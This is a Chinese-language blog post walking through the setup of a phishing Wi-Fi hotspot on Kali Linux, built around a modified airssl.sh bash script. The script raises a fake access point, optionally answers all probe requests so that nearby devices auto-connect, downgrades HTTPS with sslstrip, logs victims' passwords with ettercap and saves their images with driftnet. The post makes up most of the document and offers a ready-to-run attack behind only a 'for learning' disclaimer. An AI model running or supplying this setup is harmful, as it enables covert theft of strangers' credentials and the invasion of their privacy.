KaliLinux钓鱼Wifi搭建
2024-06-29 00:45:21
兴奋了一个中午,今天中午吃饭前终于把钓鱼ap搭建好了,原来一直出现各种各样的问题,逐个解决,现在把搭建方法及出现的问题写下。
要搭建钓鱼Wifi很简单,必备的6个东西:
1、无线网卡,这里我用的是拓石N87网卡
2、KaliLinux操作系统,这里就不用说了,必备的
3、isc-dhcp-server服务器。安装好KaliLinux后只需要apt-get update 然后apt-get install isc-dhcp-server即可
4、Aircrack-ng套件 #用来发送数据
5、sslstrip 用来突破SSL加密
6、ettercap 用来嗅探劫持
后面三个软件KaliLinux都自带有,不用安装即可。
首先强调下,后面的bash脚本适用于使用isc-dhcp-server这个bash脚本,建立钓鱼热点。
安装dhcp服务
apt-get install isc-dhcp-server
配置文件分别在/etc/default/isc-dhcp-server和/etc/dhcp/dhcpd.conf,前者可以配置监听端口,这里以wlan0为例
配置dhcp文件后,断开wlan0的网络,分配一个ip
ifconfig wlan0 192.168.1.2/24
启动dhcp服务
/etc/init.d/isc-dhcp-server start 或者
service isc-dhcp-server start
建立热点:
将下文写好的airssl.sh添加执行权限
bash airssl.sh
然后分别是AP建立,DHCP建立,sslstrip开启,ettercap开启。
代码如下:
#!/bin/bash
# 修改版,原版信息如下:
########################################################
# ©opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
########################################################
# Network questions
echo "AIRSSL_KALI"
echo "修该版本,适用于kali或者使用isc-dhcp-server的环境,原版信息如下:"
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo "仅供学习用途"
echo
route -n -A inet | grep UG
echo "DNS服务器.例如8.8.8.8: "
read -e dnsip
echo "网关地址.例如192.168.0.1:"
read -e gatewayip
echo "接入internet的接口.例如eth1: "
read -e internet_interface
echo "用于建立AP的接口.例如wlan0: "
read -e fakeap_interface
echo "AP的ESSID: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.bak
cp /etc/default/isc-dhcp-server /etc/default/isc-dhcp-server.bak
echo "ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
authoritative;
log-facility local7;
">/etc/dhcp/dhcpd.confecho -n "subnet 192.168.0.0 netmask 255.255.255.0 {range 192.168.0.100 192.168.0.200; option domain-name-servers ">>/etc/dhcp/dhcpd.conf
echo -n $dnsip>>/etc/dhcp/dhcpd.conf
echo -n ";
# option domain-name "internal.example.org";option routers ">>/etc/dhcp/dhcpd.conf
echo -n $gatewayip>>/etc/dhcp/dhcpd.conf
echo -n ";option broadcast-address 192.168.0.255;default-lease-time 600;max-lease-time 7200;
}" >> /etc/dhcp/dhcpd.conf
echo "
DHCPD_CONF=/etc/dhcp/dhcpd.conf
DHCPD_PID=/var/run/dhcpd.pid
INTERFACES="at0"
">/etc/default/isc-dhcp-server
# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "read ANSWERif [ $ANSWER = "y" ] ; then
airbase-ng --help
fiif [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fiif [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fiif [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 $gatewayip netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.0.0 netmask 255.255.255.0 gw $gatewayip
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000# DHCP
echo "[+] Setting up DHCP..."
#touch /var/run/dhcpd.pid
#chown dhcpd:dhcpd /var/run/dhcpd.pid
#xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
#sleep 3
/etc/init.d/isc-dhcp-server start
# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fiif [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fiif [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFTif [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fixterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "使用完毕请键入Y恢复系统配置,否则可能会出现问题!"
read WISH# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
mv /etc/default/isc-dhcp-server.bak /etc/default/isc-dhcp-server
mv /etc/dhcp/dhcpd.conf.bak /etc/dhcp/dhcpd.conf
/etc/init.d/isc-dhcp-server stop echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exitfi
exit
做这个最重要的还是写shell脚本
后面的脚本如果都能自己写出来,才是真正的大神。本人菜鸟,欢迎各位大神狂喷
KaliLinux钓鱼Wifi搭建相关推荐
- 钓鱼Wi-Fi搭建实践
前言 暑假回到家,无事可干,无意中看到家里还有一个闲置的路由器,于是搭建钓鱼Wi-Fi来试试玩.本文提到的技术只是交流目的,并无攻击意图. 钓鱼Wi-Fi 一般就是在公开场合无需提供密码的AP热点,这 ...
- 使用wifi-pumpkin搭建钓鱼wifi(仅供学习用途)
实验软件及工具 WiFi-Pumpkin WiFi-Pumpkin是一款专用于无线环境渗透测试的完整框架,利用该工具可以伪造接入点完成中间人攻击,同时也支持一些其他的无线渗透测试功能.旨在提供更安全的 ...
- Windows下用某品牌随身WiFi搭建一个钓鱼热点
*本文原创作者:Leslie___Cheung ,本文属于原创博客,未经许可禁止转载. *本文内容仅代表作者观点且只做测试展示,目的是提醒读者注意 WiFi 联网安全,严禁将内容用于不法用途. 目录 ...
- 渗透测试之地基服务篇:无线攻防之Kali自搭建钓鱼Wifi
简介 渗透测试-地基篇 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西. 请注意 : 本文仅用于技术讨论与研究,对于所有 ...
- 简单搭建钓鱼Wifi信号获取用户手机号
如果我们附近没有CMCC信号,我们可以搭建一个免费的CMCC钓鱼Wifi信号,让别人主动来输入手机号认证获得用户的手机号码,岂不更好,下面是实施计划. 准备:无线网卡(8137).bt5.钓鱼页面 一 ...
- 使用kali搭建钓鱼WIFI——KARMA
文章目录 前言 0x01.安装DHCP服务器 0x02.更改配置文件 0x03.下载KARMA源文件 0x04.设置网卡为监听模式 0x05.创建假冒WIFI 0x06.打开at0接口并运行DHCP服 ...
- Kali Linux 如何搭建钓鱼WIFI(图文炒鸡详细)
0x00 将网卡切换到监听模式并创建热点 airmon-ng start wlan0 这里是建立监听模式 如果出现wlan0mon则表示成功! 接下来创建热点 airbase-ng -e Free-w ...
- wifipumpkin3搭建钓鱼wifi监听用户行为
wifipumpkin3搭建钓鱼wifi监听用户行为 一.安装wifipumpkin3 git clone https://github.com/P0cL4bs/wifipumpkin3.git cd ...
- kali流量转发后依然断网_运用Kali搭建钓鱼WIFI
点击上方蓝字关注! 注:本篇文章为个人学习笔记仅供学习交流. 准备 kalilinux USB无线网卡(兼容Linux系统) 步骤 1.打开vmware虚拟机,开启kali并连接无线网卡到虚拟机,连接 ...
最新文章
- Office365从销售说起——企业办公考虑重点
- svn中出现各种感叹号说明
- mysql_fetch_row,mysql_fetch_array,mysql_fetch_assoc的区别
- 纯C++版的Faster-Rcnn(通过caffe自定义RPN层实现)
- JavaScript的对象
- Flowable 数据库表结构 ACT_HI_DETAIL
- python实现简易聊天需要登录博客园zip下载_Python基于Socket实现简易多人聊天室的示例代码...
- 硬盘模式IDE和AHCI
- [cf] Codeforces Round #595 (Div. 3) B12 Books Exchange
- java cpu100 解决办法_[Java] CPU 100% 原因查找解决
- 初识Python自动化运维(一)
- 棋牌游戏开发制做花费,您知多少呢?
- mac写python用什么软件_Mac安装软件,一条指令就搞定
- 项目实训(树莓派)(十四)树莓派4B下的ubuntu系统下的vim的使用
- Iron man2钢铁侠2
- [18调剂]北方民族大学2018年硕士研究生调剂公告
- 程序员笑话集:bug跟蚊子的相似之处
- 理光打印机MP 3054 SP苹果电脑MAC驱动
- 模拟人脑算什么,AI“扮”狗脑了解一下?
- cocos2d-x 使用位图工具BMFont自定义字体 fnt